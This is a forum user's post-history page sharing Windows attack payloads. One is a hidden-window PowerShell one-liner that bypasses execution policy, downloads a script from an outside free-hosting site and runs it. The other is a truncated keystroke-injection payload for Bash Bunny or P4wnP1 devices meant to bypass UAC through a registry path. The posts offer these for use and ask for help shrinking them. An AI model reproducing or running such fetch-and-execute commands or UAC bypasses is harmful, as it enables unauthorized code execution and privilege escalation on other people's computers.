KryptoKat

Everything posted by KryptoKat

  1. ---UPDATE--- I finally got the PowerShell script functioning. In theory, this should work on any account because everyone has access to C:\Windows\Temp:

     powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1

     Now to find something useful to do with this.
  2. ---UPDATE--- I've simplified the script to:

     powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt';

     However, I'm having trouble running the file in the same line. Any help would be greatly appreciated.
  3. In theory, this Bash Bunny script should make a directory in C:\Windows called uac-bypassed. I have no way to test this specific script because I don't have a Bash Bunny or a Rubber Ducky, so I had to make do with a P4wnP1 A.L.O.A. Any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A.)

     Q GUI R
     Q powershell
     Q ENTER
     Q DELAY 500
     Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\";